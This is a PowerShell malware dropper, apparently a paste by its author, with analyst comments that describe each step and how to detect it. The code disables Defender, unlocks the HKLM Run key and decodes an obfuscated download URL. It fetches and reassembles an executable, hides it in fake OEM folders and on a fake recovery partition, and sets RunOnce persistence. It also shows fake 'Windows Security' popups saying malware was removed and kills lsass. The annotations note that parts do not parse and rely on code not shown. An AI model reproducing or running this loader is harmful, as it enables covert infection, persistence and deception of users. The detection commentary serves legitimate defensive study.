- ### My First Powershell script making it public because I no longer write in powershell by xplosive###
# ANALYST NOTE: this paste is PowerShell (the "shell" language hint is wrong) and is a
# dropper/loader. As visible below it: disables Defender real-time monitoring, sets the
# machine ExecutionPolicy to Unrestricted, loosens the ACL on the HKLM Run key, writes the
# DisableAntiSpyware policy value, reconstructs a download URL from obfuscated strings,
# downloads a base64 blob, unpacks a zip and reassembles an .exe from three reversed
# base64 parts, stages it under an OEM-lookalike folder with decoy files, shrinks C: and
# creates a fake "Recovery Partition", adds a RunOnce entry, runs the binary, shows a fake
# "malware removed" popup, writes a fake log to the Desktop and kills lsass.exe to force a
# reboot. The code is kept byte-identical here; comments describe behaviour, required
# privileges and detection opportunities. Nearly every step (HKLM writes, Set-MpPreference,
# Resize-Partition, terminating lsass) needs an elevated shell.
# NOTE(review): the feature-flag block below is not valid PowerShell (an `else` branch is
# followed by `elseif`), so the paste does not parse as-is, and it reads several variables
# that are never assigned in this paste, so it depends on code not shown here.
# Feature flags are signalled by marker files under %TEMP%\ParamsTest. Of the flags set
# here, only $SetNamesTest (set a few lines further down) is read again later in the paste.
- if (Test-Path "$env:TEMP\ParamsTest\Defender.garbage") {
- $Defender = 1
- } else {
- $Defender = 0
- } elseif (Test-Path "$env:TEMP\ParamsTest\EnableOverride.garbage") {
- $EnableOverride = 1
- } else {
- $EnableOverride = 0
- } elseif (Test-Path "$env:TEMP\ParamsTest\EnablePayload.garbage") {
- $EnablePayload = 1
- $PayloadOptions = False
- } else {
- $EnablePayload = 0
- }
- elseif (Test-Path "$env:TEMP\ParamsTest\DriveCreation.garbage") {
- $DriveCreation = 1
- } else {
- $DriveCreation = 0
# Marker file that enables the "fix file names" step near the end of the script.
- if (Test-Path "$env:TEMP\TestPathHere.txt") {
- $SetNamesTest = 1
- }
# The manufacturer string from WMI is reused throughout to make drop paths, file names and
# the partition label look like OEM software ("<Manu> Power Saver", "<Manu> Recovery Tool").
- $Manu = Gwmi Win32_ComputerSystem | Select-Object -ExpandProperty Manufacturer
- $CurrentUser = $env:USERNAME
- $Current = $env:USERNAME
- $RandText = Get-Random
# $userInput is not assigned anywhere in this paste; the intent (from the method name) is to
# block keyboard/mouse input while the script runs. Input is unblocked only near the end.
- $userInput::BlockInput($true)
- ## Disables Monitoring
# DETECTION: Set-MpPreference -DisableRealtimeMonitoring $true is a high-signal event in the
# Defender operational log and in EDR telemetry; Tamper Protection denies this change.
- Set-MpPreference -DisableRealtimeMonitoring $true
- ## Sets exection policy
# No -Scope given, so this changes the LocalMachine policy (admin required). Note the
# -notmatch check makes the change only when the current policy is not already Unrestricted.
- $GetPolicy = Get-ExecutionPolicy
- if($GetPolicy -notmatch 'Unrestricted') {
- Set-ExecutionPolicy Unrestricted
- }
- ## Permission set for auto run
# Grants the current user FullControl on the machine-wide Run key; a second ACL edit near the
# end of the script tries to tighten it again. A DACL change on a Run key is a persistence
# preparation indicator worth alerting on.
- $acl = Get-Acl "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
- $rule = New-Object System.Security.AccessControl.RegistryAccessRule ("$CurrentUser","FullControl","Allow")
- $acl.SetAccessRule($rule)
- $acl | Set-Acl -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
- ## Disables Windows Defender
# $RegPath is never assigned in this paste. Both branches write the same DisableAntiSpyware=1
# policy value. DETECTION: creation of DisableAntiSpyware under
# HKLM\SOFTWARE\Policies\Microsoft\Windows Defender; recent Windows 10/11 client builds
# ignore this value, and Tamper Protection blocks it, so its presence is mainly an indicator.
- IF(!(Test-Path $RegPath))
- {
- New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Force
- New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value "1"
- -PropertyType DWORD -Force }
- ELSE {
- New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value "1"
- -PropertyType DWORD -Force
- }
- ##Converts Payload link to text visits the link
- ##Then downloads the text converts to a zip
- ## Opens zip converts three parts of text inside
- ## to an exe and saves it for later
# URL obfuscation: three hex strings are concatenated, the character order reversed, then
# decoded two hex digits at a time into characters. The result is sliced into three pieces,
# each padded with "=" and base64-decoded, joined, and reversed again to give the URL in
# $Zshark. The decoded URL is deliberately not reproduced in these notes.
# DETECTION: this layered string manipulation is typical of scripts written to evade static
# signatures; PowerShell Script Block Logging (Event ID 4104) and AMSI see the de-obfuscated
# content at run time.
- $LeftData1 = "5423466743743535a4e66585656555"
- $LeftData2 = "1585a596c6d62657d4232647939636"
- $LeftData3 = "76744603243336638397c477642336"
- $Strung = Get-Variable LeftData* | select-Object -ExpandProperty value
- $ArrayBack1 = [String]::Join('',$Strung)
- $ArrayBack2 = $ArrayBack1 -split ""
- [array]::Reverse($ArrayBack2)
- $ArrayBack3 = $ArrayBack2 -join ''
- $PassArray = ""
- $ArrayBack3 -split '(.{2})' |%{ if ($_ -ne "") { $PassArray+=[CHAR]([CONVERT]::toint16("$_",16)) }}
- $ArrayText1 = $PassArray[0..14] + "=" -join ""
- $ArrayText2 = $PassArray[15..29] + "=" -join ""
- $ArrayText3 = $PassArray[30..45] + "=" -join ""
- $ConvertPart3 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("$ArrayText1"))
- $ConvertPart2 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("$ArrayText2"))
- $ConvertPart1 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("$ArrayText3"))
- $ArrayReturn = Get-Variable ConvertPart* | select-Object -ExpandProperty value
- $ArrayBackA1 = [String]::Join('',$ArrayReturn)
- $ArrayBackA2 = $ArrayBackA1 -split ""
- [array]::Reverse($ArrayBackA2)
- $Zshark = $ArrayBackA2 -join ''
- ### Converts payload to zip
# Download stage: the response is treated as a base64 string (presumably the body via the
# response object's string conversion — not verifiable here), written to
# %TEMP%\TEMPAPP <random>.zip, expanded into %TEMP%\TEMPDATA <random>\, and the zip removed.
# DETECTION: powershell.exe making an outbound HTTP(S) request followed by Expand-Archive
# from %TEMP%; the "TEMPAPP"/"TEMPDATA" naming is a useful file-name indicator.
- $BaseProgram = Invoke-WebRequest -Uri $Zshark -UseBasicParsing
- $ConvertedPayload = [Convert]::FromBase64String($BaseProgram)
- $Random = Get-Random
- $ZipName = "TEMPAPP " + $Random
- $UnzipName = "TEMPDATA " + $Random
- New-Item "$Env:TEMP\$ZipName.zip" -Type File -Force
- [io.file]::WriteAllBytes("$Env:TEMP\$ZipName.zip" , $ConvertedPayload)
- Expand-Archive $env:TEMP\$ZipName.zip -DestinationPath $env:TEMP\$UnzipName\
- Remove-Item $env:TEMP\*TEMPAPP* -Force -Recurse -ErrorAction SilentlyContinue
- ## Converts Text
# The archive is expected to contain A.doc, B.doc and C.doc — text files, not documents.
- $Content1 = Get-Content $env:TEMP\$UnzipName\A.doc -Raw
- $Content2 = Get-Content $env:TEMP\$UnzipName\B.doc -Raw
- $Content3 = Get-Content $env:TEMP\$UnzipName\C.doc -Raw
- ##Reverses Payload Text
# Each part is character-reversed, then the three are joined and base64-decoded into the
# bytes of the executable ($ConvertedText). Splitting and reversing the payload is another
# signature-evasion measure; the assembled bytes only exist once written to disk below.
- $arr1 = $Content1 -split ""
- [array]::Reverse($arr1)
- $REV1 = $arr1 -join ''
- $arr2 = $Content2 -split ""
- [array]::Reverse($arr2)
- $REV2 = $arr2 -join ''
- $arr3 = $Content3 -split ""
- [array]::Reverse($arr3)
- $REV3 = $arr3 -join ''
- #Joins Payload and convets to exe
- $ContentComb = Get-Variable REV* -ValueOnly
- $Join = ''
- $ContentComb1 = [String]::Join($Join,$ContentComb)
- $ConvertedText = [Convert]::FromBase64String($ContentComb1)
- #Folder Naming Scheme
# Randomised "version" folder (e.g. "Beta 3.2") and random decoy file sizes so that every
# infection produces different paths and hashes for the decoy files.
- $ProgramName = $Manu + " Power Saver"
- $ProgramName1 = $Manu + " Recovery Tool"
- $VerNum = Get-Random -InputObject "Alpha ", "Beta ", "Public " , "Final "
- $VerNumMatch1 = Get-Random -Maximum 10
- $VerNumMatch2 = Get-Random -Maximum 6
- $FileSize1 = Get-Random -Maximum 50000
- $FileSize2 = Get-Random -Maximum 50000
- $FileSize3 = Get-Random -Maximum 10000
- $FileSize4 = Get-Random -Maximum 9000
- $VersionFolder = $VerNum + $VerNumMatch1 + "." + $VerNumMatch2
- $DriveName = $Manu + " Recovery Partition"
- #Makes it look like a manufacter product
- # Mean't for the computer
# Primary drop: C:\Users\<user>\<Manu>\Release Version\<Manu> Power Saver\<version>\
# <Manu> Power Saver.exe. DETECTION: a PE written by powershell.exe directly under the user
# profile in a path that mimics an OEM product; the same path is used for RunOnce below.
- New-Item "C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolder\$ProgramName.exe" -Type File -Force
- [io.file]::WriteAllBytes("C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolder\$ProgramName.exe" , $ConvertedText)
- ##Creates Fake files
# Decoy .dll/.conf/.xml files of random size are created with `fsutil file createnew` so the
# folder looks like an installed product. fsutil spawned from PowerShell is a good hunting
# query; the staging directory in %TEMP% is removed first.
- remove-item "$env:TEMP\*TEMPDATA*" -Force -Recurse -ErrorAction SilentlyContinue
- New-Item "C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolde\CrashReports" -Type Directory -Force
- fsutil file createnew "C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolder\NetXServiceFile.dll" $FileSize1
- fsutil file createnew "C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolder\PowerMeterF.dll" $FileSize2
- fsutil file createnew "C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolder\$ProgramName.conf" $FileSize3
- fsutil file createnew "C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolder\$Manu Diagnose.xml " $FileSize4
- ##Creates Fake Recovery Drive
# The chosen drive letter is persisted in %APPDATA%\FolderLetter\FolderLetter.txt. On the
# first run the file does not exist, Get-Content yields $null and the elseif branch runs:
# a popup titled "Windows Security" (social engineering), a random unused letter d-z is
# picked and saved, C: is shrunk by 20MB, a new partition is created, formatted and
# labelled "<Manu> Recovery Partition", and a second copy of the executable plus decoys
# is written there. The if branch repeats the partition/copy steps using the saved letter.
# DETECTION: Resize-Partition / New-Partition / Format-Volume / Set-Volume invoked from
# powershell.exe, and a new volume appearing with an OEM-style "Recovery" label.
- $DriveRandomLetter = Get-Content -Path "$env:APPDATA\FolderLetter\FolderLetter.txt"
- #Tests to see if a recovery drive has already been made
- if ($DriveRandomLetter -ne $null) {
- Resize-Partition -DriveLetter C -Size ((Get-Partition -DriveLetter C).Size - 20MB)
- $DiskNum = get-partition -DriveLetter C | get-disk | Select-Object -ExpandProperty number
- New-Partition -DiskNumber $DiskNum -UseMaximumSize -DriveLetter $DriveRandomLetter | Format-Volume -Force
- Set-Volume -DriveLetter $DriveRandomLetter -NewFileSystemLabel "$DriveName"
- $FileHere1 = "$DriveRandomLetter" + ":\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$ProgramName1.exe"
- New-Item $FileHere1 -Type File -Force
- $FileHere2 = "$DriveRandomLetter" + ":\DataTest\Test.Data"
- New-Item $FileHere2 -Type File -Force
- $FileHere3 = "$DriveRandomLetter" + ":\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$ProgramName1.exe"
- [io.file]::WriteAllBytes($FileHere3 , $ConvertedText)
- $FileHere4 = "$DriveRandomLetter" + ":\RecoveryXd4.dll"
- fsutil file createnew $FileHere4 $FileSize1
- $FileHere5 = "$DriveRandomLetter" + ":\RecoverList.Xmll"
- fsutil file createnew $FileHere5 $FileSize2
- $FileHere6 = "$DriveRandomLetter" + ":\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$ProgramName1.conf"
- fsutil file createnew $FileHere6 $FileSize3
- $FileHere7 = "$DriveRandomLetter" + ":\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$Manu Recover.xml"
- fsutil file createnew $FileHere7 $FileSize4
- $FileHere8 = "$DriveRandomLetter" + ":\DataTest"
- $file8 = Get-Item $FileHere8
# The DataTest folder is given the System attribute so Explorer hides it by default.
- $file8.Attributes = 'System'
- }elseif($DriveRandomLetter -eq $null) {
- $WH200 = New-Object -ComObject Wscript.Shell
- $WH200.Popup("We Are Going To Create A Recovery Drive Please Click Okay To Continue",0,"Windows Security",0x0)
- New-item "$env:APPDATA\FolderLetter\FolderLetter.txt" -type file -force
- $DriveRandom = ls function:[d-z]: -n | ?{ !(test-path $_) } | random
- $DriveLetterHere = $DriveRandom
- Add-Content "$env:APPDATA\FolderLetter\FolderLetter.txt" $DriveLetterHere
- Resize-Partition -DriveLetter C -Size ((Get-Partition -DriveLetter C).Size - 20MB)
- $DiskNum = get-partition -DriveLetter C | get-disk | Select-Object -ExpandProperty number
- New-Partition -DiskNumber $DiskNum -UseMaximumSize -DriveLetter $DriveLetterHere | Format-Volume -Force
- Set-Volume -DriveLetter $DriveLetterHere -NewFileSystemLabel "$DriveName"
- $FileHere9 = "$DriveLetterHere" + "\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$ProgramName1.exe"
- New-Item $FileHere9 -Type File -Force
- $FileHere10 = "$DriveLetterHere" + "\DataTest\Test.Data"
- New-Item $FileHere10 -Type File -Force
- $FileHere11 = "$DriveLetterHere" + "\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$ProgramName1.exe"
- [io.file]::WriteAllByte($FileHere11 , $ConvertedText)
- $FileHere12 = "$DriveLetterHere" + "\RecoveryXd4.dll"
- fsutil file createnew $FileHere12 $FileSize1
- $FileHere13 = "$DriveLetterHere" + "\RecoverList.Xml"
- fsutil file createnew $FileHere13 $FileSize2
- $FileHere14 = "$DriveLetterHere" + "\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$ProgramName1.conf"
- fsutil file createnew $FileHere14 $FileSize3
- $FileHere15 = "$DriveLetterHere" + "\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$Manu Recover.xml"
- fsutil file createnew $FileHere15 $FileSize4
- $FileHere16 = "$DriveLetterHere" + "\DataTest"
- $file16 = Get-Item $FileHere16
- $file16.Attributes = 'System'
- }
- $userInput::BlockInput($true)
- ## Other Payload run next boot If first payload failed
# Persistence: a RunOnce value named "Run" pointing at the dropped executable, so it starts
# at next logon even if the direct execution below fails. DETECTION: registry value set
# under HKLM\...\CurrentVersion\RunOnce by powershell.exe (Sysmon Event ID 13 / Autoruns).
- $RegPath1 = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
- $RegName1 = "Run"
- $RegValue1 = "C:\Users\$Current\$Manu\Release Version\$ProgramName\$VersionFolder\$ProgramName.exe"
- IF(!(Test-Path $RegPath1))
- {
- New-Item -Path $RegPath1 -Force
- New-ItemProperty -Path $RegPath1 -Name $RegName1 -Value $RegValue1
- -PropertyType DWORD -Force }
- ELSE {
- New-ItemProperty -Path $RegPath1 -Name $RegName1 -Value $RegValue1
- -PropertyType DWORD -Force
- }
- ##Fixes file names
# Only when the %TEMP%\TestPathHere.txt marker existed: strips the string "INFECTED" from the
# names of .exe/.txt/.png/.zip/.rar files below the current directory, then deletes the
# marker. Presumably a companion component renamed the files earlier — not shown here.
- If ($SetNamesTest -eq 1){
- Get-ChildItem -Path *.exe -Recurse -Force | foreach { rename-item $_ $_.Name.Replace("INFECTED", "") }
- Get-ChildItem -Path *.txt -Recurse -Force | foreach { rename-item $_ $_.Name.Replace("INFECTED", "") }
- Get-ChildItem -Path *.png -Recurse -Force | foreach { rename-item $_ $_.Name.Replace("INFECTED", "") }
- Get-ChildItem -Path *.zip -Recurse -Force | foreach { rename-item $_ $_.Name.Replace("INFECTED", "") }
- Get-ChildItem -Path *.rar -Recurse -Force | foreach { rename-item $_ $_.Name.Replace("INFECTED", "") }
- #Resets set names variable
- Remove-Item -Path "$env:TEMP\TestPathHere.txt" -Force
- }
- Start-Sleep -Seconds 10
- ##Hides installed file
# Sets the Hidden attribute on "%USERPROFILE%\Microsoft Apps" (a path not created anywhere
# in this paste) and on "Z:\<user>\". Note Z: is hard-coded here and in the execution line
# below, independent of the random letter chosen for the partition above.
- $file = Get-Item "$env:USERPROFILE\Microsoft Apps"
- $file.Attributes = 'Hidden'
- $file4 = Get-Item "Z:\$Current\"
- $file4.Attributes = 'Hidden'
- #Waits for payload to install then disables user acess to autorun
# Second ACL edit on the Run key, intended to reduce the current user's rights again after
# staging (the rights name is written as given in the paste).
- $acl1 = Get-Acl "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
- $rule1 = New-Object System.Security.AccessControl.RegistryAccessRule ("$CurrentUser","ReadAcess","Allow")
- $acl1.SetAccessRule($rule1)
- $acl1 | Set-Acl -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
# Executes the second copy of the payload from the Z: drive via the call operator.
# DETECTION: powershell.exe spawning a child process from a path containing "Release
# Version\<vendor> Recovery Tool".
- & "Z:\$Current\$Manu\Release Version\$ProgramName1\$VersionFolder\$ProgramName1.exe"
- $WH1 = New-Object -ComObject Wscript.Shell
- $userInput::BlockInput($false)
- ##Fake Completion Message
# Social engineering: a "Windows Security" titled popup claiming malware was removed, to
# explain the popups, the new drive and the reboot that follows.
- $WH1.Popup("Success Windows Defender Was Enabled And Powershell Removed The Malware, There Will Be A Log File On Your Desktop, Your Computer May Reboot Now",0,"Windows Security",0x0)
- ## Creates log file
# Writes a decoy "Removal Log.txt" to the Desktop containing OS details from CIM; $FakeLog
# is not assigned anywhere in this paste.
- $InfoHereNow = Get-CimInstance Win32_OperatingSystem | Select Caption, InstallDate, ServicePackMajorVersion, OSArchitecture, BootDevice, BuildNumber, CSName
- New-Item "C:\Users\$CurrentUser\Desktop\Removal Log.txt" -type file -force
- Add-content "C:\Users\$CurrentUser\Desktop\Removal Log.txt" $InfoHereNow
- Add-content "C:\Users\$CurrentUser\Desktop\Removal Log.txt" $FakeLog
- ##Reboots Computer
# Terminating lsass.exe makes Windows treat a critical process as dead and restart the
# machine. DETECTION: Stop-Process / TerminateProcess against lsass is extremely
# high-signal in EDR and Sysmon; where LSA protection (RunAsPPL) is enabled the
# termination is denied even to an administrator.
- $GetProcessID = Get-Process lsass | select-Object -ExpandProperty Id
- Stop-Process -Id $GetProcessID -force
- ##Exits
- exit